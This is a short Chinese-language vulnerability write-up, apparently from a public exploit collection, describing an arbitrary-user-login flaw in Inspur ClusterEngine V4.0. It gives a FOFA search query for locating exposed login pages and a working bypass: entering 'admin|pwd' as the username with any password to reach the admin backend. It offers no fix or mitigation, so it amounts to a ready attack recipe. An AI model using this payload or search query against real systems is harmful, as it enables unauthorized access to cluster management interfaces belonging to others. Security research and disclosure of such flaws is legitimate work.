# 浪潮ClusterEngineV4.0 任意用户登录漏洞
## 漏洞描述
浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限
## 漏洞影响
> [!NOTE]
>
> 浪潮ClusterEngineV4.0
## FOFA
> [!NOTE]
>
> title="TSCEV4.0"
## 漏洞复现
登录页面如下
![](resource/浪潮ClusterEngineV4.0-任意用户登录漏洞/media/1.png)
```
USER: admin|pwd
PASS: 任意
```
成功登陆后台
> [!NOTE]
>
> 部分功能是无法使用的
![](resource/浪潮ClusterEngineV4.0-任意用户登录漏洞/media/2.png)